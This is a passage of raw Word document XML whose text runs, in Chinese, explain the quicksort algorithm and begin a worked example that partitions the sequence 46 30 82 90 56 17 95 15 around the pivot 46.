          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> j</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> j </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>从当前序列的有段向左扫描，越过不小于基准值的记录。当遇到小于基准值的记录时，扫描停止。通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>从当前序列的左端向右扫描，越过小于基准值的记录。当遇到不小于基准值的记录时，扫描停止。交换两个方向扫描停止的记录</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> a[j] </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> a[i]</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>然后，继续扫描，直至</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> j </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>相遇为止。扫描和交换的过程结束。这是</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>左边的记录的关键字值都小于基准值，右边的记录的关键字值都不小于基准值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="00195466" w:rsidP="00C75C3A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007216CF" w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>通过两个不相邻元素交换，可以一次交换消除多个逆序，加快排序速度。快速排序方法在要排序的数据已经有序的情况下最不利于发挥其长处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　下面我们通过一个案例来演示一下快速排序的基本步骤：</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>以序列</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 46 30 82 90 56 17 95 15   </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>共</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　初始状态：</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> 30  82  90  56  17  95 </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">46 </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>作为基准值，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i = 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> j = 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i = 0                                j = 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>             </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  82  90  56  17  95  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>       15 &lt; 46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>交换</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15 </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> i = 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i = 1                           j = 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  15  30 </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>82</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  90  56  17  95  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>       30 &lt; 46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
